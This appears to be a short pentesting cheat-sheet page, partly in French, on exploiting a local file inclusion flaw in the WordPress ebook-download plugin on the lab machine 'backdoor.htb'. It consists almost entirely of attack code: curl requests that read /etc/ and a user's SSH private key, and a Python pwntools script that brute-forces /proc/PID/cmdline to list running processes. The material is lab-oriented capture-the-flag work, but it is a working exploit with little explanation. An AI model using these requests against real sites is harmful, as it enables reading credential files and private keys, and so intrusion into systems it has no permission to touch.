LFI (Proc Logs) - Pentesting Web
Exploitation LFI
http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/
LFI - Proc
Mis à jour
curl -s -X GET "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/home/user/.ssh/id_rsa"
curl -s -X GET "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/home/user/.ssh/id_rsa.pub"#!/usr/bin/python3
from pwn import *
import requests, signal, time, pdb
def def_handler(sig, frame):
print("\n\n[+]] Exiting...\n")
sys.exit(1)
# Ctrl + c
signal.signal(signal.SIGINT, def_handler)
# Global Variables
main_url = "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
def makeRequest():
# /proc/PID/cmdline
p1 = log.progress("Brute Force Attack")
p1.status("Starting Brute Force Attack")
sleep(2)
for i in range(1, 1000):
p1.status("Trying with PATH /proc/%s/cmdline" % str(i))
url = main_url + "/proc/" + str(i) + "/cmdline"
r = requests.get(url)
if len(r.content) > 82:
print("-------------------------------------------------------------------------------------")
log.info("PATH: /proc/%s/cmdline" % str(i))
log.info("Total length: %s" %len(r.content))
print(r.content)
print("-------------------------------------------------------------------------------------")
if __name__ == '__main__':
makeRequest()